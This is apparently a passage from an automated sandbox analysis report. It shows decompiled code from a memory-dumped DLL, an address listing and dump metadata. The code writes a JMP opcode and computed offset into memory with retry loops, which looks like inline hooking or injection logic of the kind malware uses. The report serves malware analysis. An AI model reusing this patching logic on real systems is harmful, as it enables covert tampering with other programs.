										_v628 = 0;
										_t1040 = _v300;
										_t1503 = _v620;
										_t1542 = _v160;
										while(1) {
											L35:
											asm("movq xmm0, [esp+0x200]");
											asm("movq [esp], xmm0");
											asm("pxor xmm2, xmm2");
											_v700 = 5;
											 *(_t1576 + 0xc) = _t1040;
											asm("movq xmm1, [esp+0x1f8]");
											 *(_t1576 + 0x10) = _v304;
											asm("movq [esp+0x14], xmm1");
											_v680 = _t1542;
											_v676 = _t1503;
											asm("movq [esp+0x24], xmm2");
											asm("movdqu xmm3, [esp+0x40]");
											asm("movq [esp+0x2c], xmm3");
											_t793 = E6E7B04B0(_t1503, _t1542);
											__eflags = _t793;
											if(_t793 == 0) {
												break;
											}
											_t1055 = 0;
											__eflags = 0;
											while(1) {
												_t911 = E6E78CA10( &_v284, __eflags);
												_t1326 = _t1459;
												_t1459 = _t911 | _t1326;
												__eflags = _t1459;
												if(_t1459 != 0) {
													break;
												}
												__eflags = _t1055 - 0x20;
												if(_t1055 == 0x20) {
													_t1040 = 0xffffffff;
													_v304 = 0xffffffff;
												} else {
													E6E7922A0(0x5dc, _t1459);
													_t1055 = _t1055 + 1;
													continue;
												}
												L47:
												__eflags = _t1040 - 0xffffffff | _v304 - 0xffffffff;
												if((_t1040 - 0xffffffff | _v304 - 0xffffffff) == 0) {
													E6E78E230( &_v412);
													E6E7B2530(_t1040,  &_v436, 0xffffffff, _t1503, _t1542);
													E6E7A9510( &_v324);
													E6E7A9510( &_v340);
													E6E7A9510( &_v356);
													E6E7A9510( &_v156);
													E6E78E2F0(_t1040,  &_v264, _t1569);
													E6E7A9510( &_v280);
													__eflags = 0;
													return 0;
												} else {
													_t1459 = _v628 + 1;
													_v628 = _t1459;
													__eflags = _t1459 - 0xa;
													if(_t1459 != 0xa) {
														goto L35;
													} else {
														E6E78E230( &_v412);
														E6E7B2530(_t1040,  &_v436, _t1459, _t1503, _t1542);
														E6E7A9510( &_v324);
														E6E7A9510( &_v340);
														E6E7A9510( &_v356);
														E6E7A9510( &_v156);
														E6E78E2F0(_t1040,  &_v264, _t1569);
														E6E7A9510( &_v280);
														__eflags = 0;
														return 0;
													}
												}
												goto L95;
											}
											_v304 = _t1326;
											_t1040 = _t911;
											goto L47;
										}
										_v300 = _t1040;
										__eflags = 0;
										_t1041 = _v304;
										_t1543 = _v300;
										_v644 = 0;
										while(1) {
											_t795 = E6E7A9640( &_v324, 0);
											_t1504 = _t795;
											_push(E6E7A9650( &_v328));
											_push(_v624);
											_push(_v164);
											_push(_t1041);
											_push(_t1543);
											_t1460 = _t795;
											__eflags = E6E78D170( &_v288, _t1460);
											if(__eflags != 0) {
												break;
											}
											_t1518 = 0;
											__eflags = 0;
											while(1) {
												_t1543 = E6E78CA10( &_v304, __eflags);
												_t1041 = _t1460;
												__eflags = _t1543 | _t1041;
												if((_t1543 | _t1041) != 0) {
													break;
												}
												__eflags = _t1518 - 0x20;
												if(_t1518 == 0x20) {
													_t1543 = 0xffffffff;
													_t1041 = 0xffffffff;
												} else {
													E6E7922A0(0x5dc, _t1460);
													_t1518 = _t1518 + 1;
													continue;
												}
												break;
											}
											_t1472 = _t1041 - 0xffffffff;
											__eflags = _t1543 - 0xffffffff | _t1041 - 0xffffffff;
											if((_t1543 - 0xffffffff | _t1041 - 0xffffffff) == 0) {
												E6E78E230( &_v432);
												E6E7B2530(_t1041, _t1576 + 0x110, _t1472, _t1518, _t1543);
												E6E7A9510( &_v344);
												E6E7A9510(_t1576 + 0x170);
												E6E7A9510( &_v376);
												E6E7A9510( &_v176);
												E6E78E2F0(_t1041,  &_v284, _t1569);
												E6E7A9510( &_v300);
												__eflags = 0;
												return 0;
											} else {
												_t900 =  *((intOrPtr*)(_t1576 + 0x40)) + 1;
												 *((intOrPtr*)(_t1576 + 0x40)) = _t900;
												__eflags = _t900 - 0xa;
												if(_t900 != 0xa) {
													continue;
												} else {
													E6E78E230( &_v432);
													E6E7B2530(_t1041, _t1576 + 0x110, _t1472, _t1518, _t1543);
													E6E7A9510( &_v344);
													E6E7A9510(_t1576 + 0x170);
													E6E7A9510( &_v376);
													E6E7A9510( &_v176);
													E6E78E2F0(_t1041,  &_v284, _t1569);
													E6E7A9510( &_v300);
													__eflags = 0;
													return 0;
												}
											}
											goto L95;
										}
										_v320 = _t1543;
										_t798 =  &_v636;
										 *(_t798 + 0x138) = _t1041;
										_t1544 =  *((intOrPtr*)(_t798 - 8));
										_t1461 = _t1576 + 0x6c;
										_t799 = E6E7B0C90( *((intOrPtr*)(_t798 - 8)), _t1576 + 0x6c, __eflags,  &_v624, _v636, _t798);
										__eflags = _t799;
										if(_t799 == 0) {
											_push(0);
											E6E7A9350(_t1576 + 0x44);
											_v644 = 0xe9;
											E6E7A9710( &_v668,  &_v644, 1);
											_v660 = _v192 -  *((intOrPtr*)( &_v660 + 0x154)) + 0xfffffffb;
											E6E7A9710( &_v676,  &_v660, 4);
											_t1043 =  &_v656;
											asm("movq xmm0, [0x6e7b9d50]");
											 *((intOrPtr*)(_t1043 + 4)) = _v328;
											 *((intOrPtr*)(_t1043 + 8)) =  *((intOrPtr*)(_t1043 + 0x1bc));
											asm("movq [ebx+0xc], xmm0");
											E6E7B0C90(_t1544, _t1576 + 0x6c, __eflags,  &_v644, 0x40, _t1043);
											__eflags = 0;
											_v676 = 0;
											_t1044 = _v356;
											_t1545 = _v352;
											while(1) {
												_t810 = E6E7A9640( &_v668, 0);
												_push(E6E7A9650(_t1576 + 0x40));
												_push(_v200);
												_push(_v316);
												_push(_t1044);
												_push(_t1545);
												_t1465 = _t810;
												_t812 = E6E78D170( &_v312, _t1465);
												__eflags = _t812;
												if(_t812 != 0) {
													break;
												}
												_t1514 = 0;
												__eflags = 0;
												while(1) {
													_t1545 = E6E78CA10( &_v328, __eflags);
													_t1044 = _t1465;
													__eflags = _t1545 | _t1044;
													if((_t1545 | _t1044) != 0) {
														break;
													}
													__eflags = _t1514 - 0x20;
													if(_t1514 == 0x20) {
														_t1545 = 0xffffffff;
														_t1044 = 0xffffffff;
													} else {
														E6E7922A0(0x5dc, _t1465);
														_t1514 = _t1514 + 1;
														continue;
													}
													break;
												}
												_t1470 = _t1044 - 0xffffffff;
												__eflags = _t1545 - 0xffffffff | _t1044 - 0xffffffff;
												if((_t1545 - 0xffffffff | _t1044 - 0xffffffff) == 0) {
													E6E7A9510(_t1576 + 0x40);
													E6E78E230(_t1576 + 0x128);
													E6E7B2530(_t1044,  &_v480, _t1470, _t1514, _t1545);
													E6E7A9510( &_v368);
													E6E7A9510( &_v384);
													E6E7A9510( &_v400);
													E6E7A9510( &_v200);
													E6E78E2F0(_t1044,  &_v308, _t1569);
													E6E7A9510( &_v324);
													__eflags = 0;
													return 0;
												} else {
													_t865 = _v668 + 1;
													_v668 = _t865;
													__eflags = _t865 - 0xa;
													if(_t865 != 0xa) {
														continue;
													} else {
														E6E7A9510(_t1576 + 0x40);
														E6E78E230(_t1576 + 0x128);
														E6E7B2530(_t1044,  &_v480, _t1470, _t1514, _t1545);
														E6E7A9510( &_v368);
														E6E7A9510( &_v384);
														E6E7A9510( &_v400);
														E6E7A9510( &_v200);
														E6E78E2F0(_t1044,  &_v308, _t1569);
														E6E7A9510( &_v324);
														__eflags = 0;
														return 0;
													}
												}
												goto L95;
											}
											_v348 = _t1044;
											_t1045 = 0;
											__eflags = 0;
											_v344 = _t1545;
											_t1466 = _v348;
											_t813 = _t1545;
											while(1) {
												asm("movq xmm0, [esp+0x200]");
												asm("movq [esp], xmm0");
												asm("pxor xmm1, xmm1");
												_v744 = 5;
												_v740 = _t813;
												_v736 = _t1466;
												_v732 = _v332;
												 *((intOrPtr*)(_t1576 + 0x18)) = _v216;
												_t1546 =  *((intOrPtr*)(_t1576 + 0x21c));
												_v724 =  *((intOrPtr*)(_t1576 + 0x21c));
												_t1507 =  *((intOrPtr*)(_t1576 + 0x220));
												 *((intOrPtr*)(_t1576 + 0x20)) =  *((intOrPtr*)(_t1576 + 0x220));
												asm("movq [esp+0x24], xmm1");
												asm("movq [esp+0x2c], xmm1");
												_t815 = E6E7B04B0( *((intOrPtr*)(_t1576 + 0x220)),  *((intOrPtr*)(_t1576 + 0x21c)));
												__eflags = _t815;
												if(_t815 == 0) {
													break;
												}
												_t1547 = 0;
												__eflags = 0;
												while(1) {
													_t813 = E6E78CA10( &_v328, __eflags);
													__eflags = _t813 | _t1466;
													if((_t813 | _t1466) != 0) {
														break;
													}
													__eflags = _t1547 - 0x20;
													if(_t1547 == 0x20) {
														_t813 = 0xffffffff;
														_t1466 = 0xffffffff;
													} else {
														E6E7922A0(0x5dc, _t1466);
														_t1547 = _t1547 + 1;
														continue;
													}
													break;
												}
												_t1549 = _t1466 - 0xffffffff;
												_t1510 = _t813 - 0xffffffff | _t1466 - 0xffffffff;
												__eflags = _t813 - 0xffffffff | _t1466 - 0xffffffff;
												if((_t813 - 0xffffffff | _t1466 - 0xffffffff) == 0) {
													E6E7A9510(_t1576 + 0x40);
													E6E78E230(_t1576 + 0x128);
													E6E7B2530(_t1045,  &_v480, _t1466, _t1510, _t1549);
													E6E7A9510( &_v368);
													E6E7A9510( &_v384);
													E6E7A9510( &_v400);
													E6E7A9510( &_v200);
													E6E78E2F0(_t1045,  &_v308, _t1569);
													E6E7A9510( &_v324);
													__eflags = 0;
													return 0;
												} else {
													_t1045 = _t1045 + 1;
													__eflags = _t1045 - 0xa;
													if(_t1045 != 0xa) {
														continue;
													} else {
														E6E7A9510(_t1576 + 0x40);
														E6E78E230(_t1576 + 0x128);
														E6E7B2530(_t1045,  &_v480, _t1466, _t1510, _t1549);
														E6E7A9510( &_v368);
														E6E7A9510( &_v384);
														E6E7A9510( &_v400);
														E6E7A9510( &_v200);
														E6E78E2F0(_t1045,  &_v308, _t1569);
														E6E7A9510( &_v324);
														__eflags = 0;
														return 0;
													}
												}
												goto L95;
											}
											_push(0);
											_t1467 = _v168;
											__eflags = _t1467;
											_t1468 =  !=  ? _t1467 + 0xc : _t1467;
											_push( !=  ? _t1467 + 0xc : _t1467);
											_t1047 = E6E7B1A80( !=  ? _t1467 + 0xc : _t1467, _t1467,  &_v480, 0x2710);
											E6E7A9510(_t1576 + 0x50);
											E6E78E230(_t1576 + 0x138);
											E6E7B2530(_t1047,  &_v480,  !=  ? _t1467 + 0xc : _t1467, _t1507, _t1546);
											E6E7A9510( &_v368);
											E6E7A9510( &_v384);
											E6E7A9510( &_v400);
											E6E7A9510( &_v200);
											E6E78E2F0(_t1047,  &_v308, _t1569);
											E6E7A9510( &_v324);
											__eflags = _t1047 - 1;
											_t465 = _t1047 - 1 > 0;
											__eflags = _t465;
											return 0 | _t465;
										} else {
											E6E78E230( &_v432);
											E6E7B2530( &_v624, _t1576 + 0x110, _t1461, _t1504, _t1544);
											E6E7A9510( &_v344);
											E6E7A9510(_t1576 + 0x170);
											E6E7A9510( &_v376);
											E6E7A9510( &_v176);
											E6E78E2F0( &_v624,  &_v284, _t1569);
											E6E7A9510( &_v300);
											__eflags = 0;
											return 0;
										}
									}
								}
							}
						} else {
							goto L6;
						}
					}
				} else {
					E6E7A9510(_t1572 + 0x228);
					E6E78E2F0(_t1027,  &_v180, _t1569);
					E6E7A9510( &_v196);
					return 0;
				}
				L95:
			}

0x6e78acd9
0x6e78acdf
0x6e78ace3
0x6e78acf4
0x6e78acf7
0x6e78acfc
0x6e78ad05
0x6e78ad0c
0x6e78ad13
0x6e78ad1b
0x6e78ad20
0x6e78ad29
0x6e78ad2e
0x6e78ad3d
0x6e78ad41
0x6e78ad57
0x6e78ad73
0x6e78ad78
0x6e78ad84
0x6e78ad88
0x6e78ad8b
0x6e78ad93
0x6e78ada9
0x6e78adc5
0x6e78adca
0x6e78add6
0x6e78adda
0x6e78addd
0x6e78ade5
0x6e78adfb
0x6e78ae17
0x6e78ae1c
0x6e78ae28
0x6e78ae2c
0x6e78ae2f
0x6e78ae37
0x6e78ae4d
0x6e78ae69
0x6e78ae6e
0x6e78ae7a
0x6e78ae7e
0x6e78ae81
0x6e78ae89
0x6e78ae9f
0x6e78aebb
0x6e78aec0
0x6e78aecc
0x6e78aed0
0x6e78aed3
0x6e78aedb
0x6e78aef1
0x6e78af0d
0x6e78af12
0x6e78af23
0x6e78af26
0x6e78af34
0x6e78af39
0x6e78af3e
0x6e78af50
0x6e78af55
0x6e78af5a
0x6e78af6c
0x6e78af71
0x6e78af76
0x6e78af88
0x6e78af8d
0x6e78af92
0x6e78afa4
0x6e78afa9
0x6e78afae
0x6e78afc0
0x6e78afc5
0x6e78afd1
0x6e78afd6
0x6e78afeb
0x6e78aff0
0x6e78aff9
0x6e78b002
0x6e78b039
0x6e78b042
0x6e78b05f
0x6e78b072
0x6e78b077
0x6e78b07c
0x6e78c89d
0x6e78c8a0
0x6e78c8a4
0x6e78c8a6
0x6e78c8aa
0x6e78c8af
0x6e78c8d5
0x6e78c8e1
0x6e78c8e9
0x6e78c8f5
0x6e78c903
0x6e78c908
0x6e78c90e
0x00000000
0x6e78c914
0x6e78c914
0x6e78c920
0x6e78c924
0x6e78c928
0x6e78c92a
0x00000000
0x6e78c930
0x6e78c930
0x6e78c935
0x00000000
0x6e78c93b
0x6e78c93b
0x6e78c946
0x6e78c954
0x6e78c967
0x6e78c96c
0x6e78c978
0x6e78c980
0x6e78c98c
0x6e78c99f
0x6e78c9a1
0x6e78c9ab
0x6e78c9b5
0x6e78c9b8
0x6e78c9c0
0x6e78c9c2
0x6e78c9c6
0x6e78c9c8
0x6e78c9cc
0x6e78c9cc
0x6e78c9ce
0x6e78c9d2
0x6e78c9d2
0x6e78c9d3
0x6e78c9d7
0x6e78c9db
0x6e78c9de
0x6e78c9e1
0x00000000
0x00000000
0x6e78c9e3
0x6e78c9e7
0x6e78c9ea
0x00000000
0x00000000
0x00000000
0x6e78c9ea
0x6e78c9ec
0x6e78c9ec
0x6e78c9f7
0x6e78c9ff
0x6e78c9ff
0x6e78c935
0x6e78c92a
0x6e78b082
0x6e78b082
0x6e78b082
0x6e78b08b
0x6e78b08b
0x6e78b097
0x6e78b0a3
0x6e78b0a8
0x6e78b0b7
0x6e78b0bb
0x6e78b0d1
0x6e78b0ed
0x6e78b0f2
0x6e78b0fe
0x6e78b102
0x6e78b105
0x6e78b10d
0x6e78b123
0x6e78b13f
0x6e78b144
0x6e78b150
0x6e78b154
0x6e78b157
0x6e78b15f
0x6e78b175
0x6e78b191
0x6e78b196
0x6e78b19b
0x6e78b19e
0x6e78b1aa
0x6e78b1b9
0x6e78b1be
0x6e78b1c2
0x6e78b1d0
0x6e78b1d5
0x6e78b1da
0x6e78b1ec
0x6e78b1f1
0x6e78b1f6
0x6e78b20d
0x6e78b215
0x6e78b21c
0x6e78b223
0x6e78b22c
0x6e78b231
0x6e78b23a
0x6e78b246
0x6e78b248
0x6e78b24f
0x6e78b262
0x6e78b269
0x6e78b282
0x6e78b290
0x6e78b2a7
0x6e78b2ac
0x6e78b2bb
0x6e78b2c2
0x6e78b2d2
0x6e78b2d9
0x6e78b2ee
0x6e78b2f3
0x6e78b2fa
0x6e78b303
0x6e78b30a
0x6e78b319
0x6e78b320
0x6e78b32c
0x6e78b338
0x6e78b344
0x6e78b350
0x6e78b35c
0x6e78b361
0x6e78b36f
0x6e78b30c
0x6e78b313
0x6e78b317
0x6e78b37e
0x6e78b383
0x6e78b38b
0x6e78b399
0x6e78b39a
0x6e78b39b
0x6e78b3a4
0x6e78b3ab
0x6e78b3b5
0x6e78b3bf
0x6e78b3c9
0x6e78b3d5
0x6e78b3d6
0x6e78b3dd
0x6e78b3e1
0x6e78b3e5
0x6e78b3f3
0x6e78b401
0x6e78b402
0x6e78b40a
0x6e78b40e
0x6e78b412
0x6e78b420
0x6e78b433
0x6e78b434
0x6e78b438
0x6e78b43c
0x6e78b440
0x6e78b460
0x6e78b46c
0x6e78b476
0x6e78b47c
0x6e78b482
0x6e78b487
0x6e78b496
0x6e78b49a
0x6e78b4b0
0x6e78b4cc
0x6e78b4d1
0x6e78b4dd
0x6e78b4e1
0x6e78b4e4
0x6e78b4ec
0x6e78b502
0x6e78b51e
0x6e78b523
0x6e78b52f
0x6e78b533
0x6e78b536
0x6e78b53e
0x6e78b554
0x6e78b570
0x6e78b575
0x6e78b581
0x6e78b585
0x6e78b588
0x6e78b590
0x6e78b5a6
0x6e78b5c2
0x6e78b5c7
0x6e78b5d3
0x6e78b5d7
0x6e78b5da
0x6e78b5e2
0x6e78b5f8
0x6e78b614
0x6e78b619
0x6e78b625
0x6e78b629
0x6e78b62c
0x6e78b634
0x6e78b64a
0x6e78b666
0x6e78b66b
0x6e78b677
0x6e78b67b
0x6e78b67e
0x6e78b686
0x6e78b69c
0x6e78b6b8
0x6e78b6bd
0x6e78b6c9
0x6e78b6cd
0x6e78b6d0
0x6e78b6d8
0x6e78b6ee
0x6e78b70a
0x6e78b70f
0x6e78b714
0x6e78b720
0x6e78b723
0x6e78b731
0x6e78b736
0x6e78b73b
0x6e78b74a
0x6e78b74f
0x6e78b754
0x6e78b763
0x6e78b768
0x6e78b76d
0x6e78b77f
0x6e78b784
0x6e78b789
0x6e78b79b
0x6e78b7a0
0x6e78b7a5
0x6e78b7b7
0x6e78b7bc
0x6e78b7c1
0x6e78b7d3
0x6e78b7d8
0x6e78b7dd
0x6e78b7ef
0x6e78b7f4
0x6e78b800
0x6e78b808
0x6e78b80d
0x6e78b814
0x6e78b824
0x6e78b826
0x6e78b828
0x6e78c829
0x6e78c835
0x6e78c841
0x6e78c84d
0x6e78c859
0x6e78c865
0x6e78c871
0x6e78c87d
0x6e78c882
0x6e78c890
0x6e78b82e
0x6e78b835
0x6e78b835
0x6e78b83c
0x6e78ba4c
0x6e78ba50
0x6e78ba50
0x6e78ba52
0x6e78ba56
0x6e78ba56
0x6e78ba5f
0x6e78ba71
0x6e78ba85
0x6e78ba93
0x6e78baa6
0x6e78bab2
0x6e78babe
0x6e78bac3
0x6e78bad1
0x6e78bad7
0x6e78badc
0x6e78bade
0x6e78bb91
0x6e78bb91
0x6e78bb9a
0x6e78bb9f
0x6e78bba3
0x6e78bbb2
0x6e78bbbd
0x6e78bbc6
0x6e78bbca
0x6e78bbd0
0x6e78bbd7
0x6e78bbdb
0x6e78bbe2
0x6e78bbe6
0x6e78bbec
0x6e78bbf2
0x6e78bbf7
0x6e78bbf9
0x6e78bc7d
0x6e78bc89
0x6e78bc9d
0x6e78bca4
0x6e78bcb0
0x6e78bcb7
0x6e78c815
0x6e78c819
0x00000000
0x6e78bcbd
0x6e78bcc4
0x6e78bcc9
0x6e78bcd0
0x6e78bce0
0x6e78bce2
0x6e78bce4
0x6e78c7ab
0x6e78c7b7
0x6e78c7c3
0x6e78c7cf
0x6e78c7db
0x6e78c7e7
0x6e78c7f3
0x6e78c7ff
0x6e78c804
0x6e78c812
0x00000000
0x00000000
0x00000000
0x6e78bce4
0x00000000
0x00000000
0x00000000
0x6e78bae4
0x6e78bae4
0x6e78bae6
0x6e78baea
0x6e78baec
0x6e78baee
0x6e78baf6
0x6e78bafb
0x6e78bb04
0x6e78bb09
0x6e78bb18
0x6e78bb23
0x6e78bb2c
0x6e78bb30
0x6e78bb33
0x6e78bb39
0x6e78bb41
0x6e78bb45
0x6e78bb49
0x6e78bb4d
0x6e78bb55
0x6e78bb5b
0x6e78bb60
0x6e78bb62
0x00000000
0x00000000
0x6e78bb6d
0x6e78bb72
0x6e78bb7c
0x6e78bb7f
0x6e78bb80
0x6e78bb85
0x6e78bb87
0x00000000
0x6e78bb8d
0x6e78bb8d
0x00000000
0x6e78bb8d
0x00000000
0x6e78bb87
0x6e78bbfb
0x6e78bc02
0x6e78bc0e
0x6e78bc1a
0x6e78bc26
0x6e78bc32
0x6e78bc3e
0x6e78bc4a
0x6e78bc56
0x6e78bc62
0x6e78bc67
0x6e78bc75
0x6e78bc75
0x00000000
0x6e78bcea
0x6e78bcea
0x6e78bceb
0x6e78bceb
0x6e78bcfb
0x6e78bd07
0x6e78bd13
0x6e78bd1f
0x6e78bd2b
0x6e78bd37
0x6e78bd43
0x6e78bd4f
0x6e78bd54
0x6e78bd62
0x6e78b842
0x6e78b842
0x6e78b842
0x6e78b846
0x6e78b846
0x6e78b848
0x6e78b84c
0x6e78b853
0x6e78b85a
0x6e78b85a
0x6e78b863
0x6e78b86c
0x6e78b870
0x6e78b875
0x6e78b87d
0x6e78b881
0x6e78b885
0x6e78b892
0x6e78b89d
0x6e78b8a5
0x6e78b8a9
0x6e78b8af
0x6e78b8b5
0x6e78b8ba
0x6e78b8bc
0x00000000
0x00000000
0x6e78b8ce
0x6e78b8d0
0x6e78b8dd
0x6e78b8df
0x6e78b8e1
0x6e78bd6c
0x6e78bd78
0x6e78bd84
0x6e78bd90
0x6e78bd9c
0x6e78bda8
0x6e78bdb4
0x6e78bdc0
0x6e78bdc5
0x6e78bdd3
0x6e78b8e7
0x6e78b8e7
0x6e78b8e8
0x6e78b8eb
0x00000000
0x6e78b8f1
0x6e78b8f8
0x6e78b904
0x6e78b910
0x6e78b91c
0x6e78b928
0x6e78b934
0x6e78b940
0x6e78b94c
0x6e78b951
0x6e78b95f
0x6e78b95f
0x6e78b8eb
0x00000000
0x6e78b8e1
0x6e78b962
0x6e78b969
0x6e78b969
0x6e78b96b
0x6e78b972
0x6e78b979
0x6e78b980
0x6e78b980
0x6e78b985
0x6e78b98c
0x6e78b993
0x6e78b994
0x6e78b99c
0x6e78b9a8
0x6e78b9aa
0x00000000
0x00000000
0x6e78b9bc
0x6e78b9be
0x6e78b9cb
0x6e78b9cd
0x6e78b9cf
0x6e78bddd
0x6e78bde9
0x6e78bdf5
0x6e78be01
0x6e78be0d
0x6e78be19
0x6e78be25
0x6e78be31
0x6e78be36
0x6e78be44
0x6e78b9d5
0x6e78b9d5
0x6e78b9d6
0x6e78b9d9
0x00000000
0x6e78b9db
0x6e78b9e2
0x6e78b9ee
0x6e78b9fa
0x6e78ba06
0x6e78ba12
0x6e78ba1e
0x6e78ba2a
0x6e78ba36
0x6e78ba3b
0x6e78ba49
0x6e78ba49
0x6e78b9d9
0x00000000
0x6e78b9cf
0x6e78be47
0x6e78be58
0x6e78be5c
0x6e78be5d
0x6e78be61
0x6e78be65
0x6e78be6b
0x6e78be6f
0x6e78be75
0x6e78be79
0x6e78be7d
0x6e78be82
0x6e78be89
0x6e78be8c
0x6e78be91
0x6e78be99
0x6e78be9d
0x6e78bea2
0x6e78bea4
0x6e78c73a
0x6e78c746
0x6e78c752
0x6e78c75e
0x6e78c76a
0x6e78c776
0x6e78c782
0x6e78c78e
0x6e78c793
0x6e78c7a1
0x6e78beaa
0x6e78beaa
0x6e78beac
0x6e78beb0
0x6e78beb4
0x6e78bebb
0x6e78bebf
0x6e78bec6
0x6e78bec6
0x6e78bec6
0x6e78becf
0x6e78bed4
0x6e78bed8
0x6e78bee0
0x6e78beeb
0x6e78bef4
0x6e78bef8
0x6e78befe
0x6e78bf02
0x6e78bf06
0x6e78bf0c
0x6e78bf12
0x6e78bf18
0x6e78bf1d
0x6e78bf1f
0x00000000
0x00000000
0x6e78bf21
0x6e78bf21
0x6e78bf23
0x6e78bf2a
0x6e78bf2f
0x6e78bf33
0x6e78bf33
0x6e78bf35
0x00000000
0x00000000
0x6e78bf3b
0x6e78bf3e
0x6e78bfde
0x6e78bfe3
0x6e78bf44
0x6e78bf49
0x6e78bf4e
0x00000000
0x6e78bf4e
0x6e78bfea
0x6e78bffc
0x6e78bffe
0x6e78c08e
0x6e78c09a
0x6e78c0a6
0x6e78c0b2
0x6e78c0be
0x6e78c0ca
0x6e78c0d6
0x6e78c0e2
0x6e78c0e7
0x6e78c0f5
0x6e78c004
0x6e78c008
0x6e78c009
0x6e78c00d
0x6e78c010
0x00000000
0x6e78c016
0x6e78c01d
0x6e78c029
0x6e78c035
0x6e78c041
0x6e78c04d
0x6e78c059
0x6e78c065
0x6e78c071
0x6e78c076
0x6e78c084
0x6e78c084
0x6e78c010
0x00000000
0x6e78bffe
0x6e78c0f8
0x6e78c0ff
0x00000000
0x6e78c0ff
0x6e78bf51
0x6e78bf58
0x6e78bf5a
0x6e78bf61
0x6e78bf68
0x6e78bf6c
0x6e78bf75
0x6e78bf7a
0x6e78bf88
0x6e78bf89
0x6e78bf8d
0x6e78bf94
0x6e78bf95
0x6e78bf96
0x6e78bfa4
0x6e78bfa6
0x00000000
0x00000000
0x6e78bfac
0x6e78bfac
0x6e78bfae
0x6e78bfba
0x6e78bfbc
0x6e78bfc0
0x6e78bfc2
0x00000000
0x00000000
0x6e78bfc8
0x6e78bfcb
0x6e78c106
0x6e78c10b
0x6e78bfd1
0x6e78bfd6
0x6e78bfdb
0x00000000
0x6e78bfdb
0x00000000
0x6e78bfcb
0x6e78c118
0x6e78c11a
0x6e78c11c
0x6e78c1ac
0x6e78c1b8
0x6e78c1c4
0x6e78c1d0
0x6e78c1dc
0x6e78c1e8
0x6e78c1f4
0x6e78c200
0x6e78c205
0x6e78c213
0x6e78c122
0x6e78c126
0x6e78c127
0x6e78c12b
0x6e78c12e
0x00000000
0x6e78c134
0x6e78c13b
0x6e78c147
0x6e78c153
0x6e78c15f
0x6e78c16b
0x6e78c177
0x6e78c183
0x6e78c18f
0x6e78c194
0x6e78c1a2
0x6e78c1a2
0x6e78c12e
0x00000000
0x6e78c11c
0x6e78c216
0x6e78c21d
0x6e78c221
0x6e78c227
0x6e78c236
0x6e78c23a
0x6e78c23f
0x6e78c241
0x6e78c2b4
0x6e78c2ba
0x6e78c2bf
0x6e78c2cf
0x6e78c2e8
0x6e78c2f1
0x6e78c2fd
0x6e78c309
0x6e78c311
0x6e78c314
0x6e78c317
0x6e78c328
0x6e78c32d
0x6e78c32f
0x6e78c333
0x6e78c33a
0x6e78c341
0x6e78c347
0x6e78c357
0x6e78c358
0x6e78c35f
0x6e78c366
0x6e78c367
0x6e78c368
0x6e78c371
0x6e78c376
0x6e78c378
0x00000000
0x00000000
0x6e78c37e
0x6e78c37e
0x6e78c380
0x6e78c38c
0x6e78c38e
0x6e78c392
0x6e78c394
0x00000000
0x00000000
0x6e78c396
0x6e78c399
0x6e78c3a8
0x6e78c3ad
0x6e78c39b
0x6e78c3a0
0x6e78c3a5
0x00000000
0x6e78c3a5
0x00000000
0x6e78c399
0x6e78c3ba
0x6e78c3bc
0x6e78c3be
0x6e78c454
0x6e78c460
0x6e78c46c
0x6e78c478
0x6e78c484
0x6e78c490
0x6e78c49c
0x6e78c4a8
0x6e78c4b4
0x6e78c4b9
0x6e78c4c7
0x6e78c3c4
0x6e78c3c8
0x6e78c3c9
0x6e78c3cd
0x6e78c3d0
0x00000000
0x6e78c3d6
0x6e78c3da
0x6e78c3e6
0x6e78c3f2
0x6e78c3fe
0x6e78c40a
0x6e78c416
0x6e78c422
0x6e78c42e
0x6e78c43a
0x6e78c43f
0x6e78c44d
0x6e78c44d
0x6e78c3d0
0x00000000
0x6e78c3be
0x6e78c4ca
0x6e78c4d1
0x6e78c4d1
0x6e78c4d3
0x6e78c4da
0x6e78c4e1
0x6e78c4e3
0x6e78c4e3
0x6e78c4ec
0x6e78c4f1
0x6e78c4f5
0x6e78c4fd
0x6e78c501
0x6e78c50c
0x6e78c517
0x6e78c51b
0x6e78c522
0x6e78c526
0x6e78c52d
0x6e78c531
0x6e78c537
0x6e78c53d
0x6e78c542
0x6e78c544
0x00000000
0x00000000
0x6e78c5f3
0x6e78c5f3
0x6e78c5f5
0x6e78c5fc
0x6e78c603
0x6e78c605
0x00000000
0x00000000
0x6e78c607
0x6e78c60a
0x6e78c619
0x6e78c61e
0x6e78c60c
0x6e78c611
0x6e78c616
0x00000000
0x6e78c616
0x00000000
0x6e78c60a
0x6e78c62b
0x6e78c62d
0x6e78c62d
0x6e78c62f
0x6e78c6bd
0x6e78c6c9
0x6e78c6d5
0x6e78c6e1
0x6e78c6ed
0x6e78c6f9
0x6e78c705
0x6e78c711
0x6e78c71d
0x6e78c722
0x6e78c730
0x6e78c635
0x6e78c635
0x6e78c636
0x6e78c639
0x00000000
0x6e78c63f
0x6e78c643
0x6e78c64f
0x6e78c65b
0x6e78c667
0x6e78c673
0x6e78c67f
0x6e78c68b
0x6e78c697
0x6e78c6a3
0x6e78c6a8
0x6e78c6b6
0x6e78c6b6
0x6e78c639
0x00000000
0x6e78c62f
0x6e78c54a
0x6e78c54c
0x6e78c553
0x6e78c558
0x6e78c55b
0x6e78c56e
0x6e78c577
0x6e78c583
0x6e78c58f
0x6e78c59b
0x6e78c5a7
0x6e78c5b3
0x6e78c5bf
0x6e78c5cb
0x6e78c5d7
0x6e78c5de
0x6e78c5e1
0x6e78c5e1
0x6e78c5f0
0x6e78c243
0x6e78c24a
0x6e78c256
0x6e78c262
0x6e78c26e
0x6e78c27a
0x6e78c286
0x6e78c292
0x6e78c29e
0x6e78c2a3
0x6e78c2b1
0x6e78c2b1
0x6e78c241
0x6e78bea4
0x6e78b83c
0x00000000
0x00000000
0x00000000
0x6e78b317
0x6e78b004
0x6e78b00b
0x6e78b017
0x6e78b023
0x6e78b036
0x6e78b036
0x00000000

Strings

ZFhj, xrefs: 6E78B588

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ZFhj
API String ID: 0-4053837889
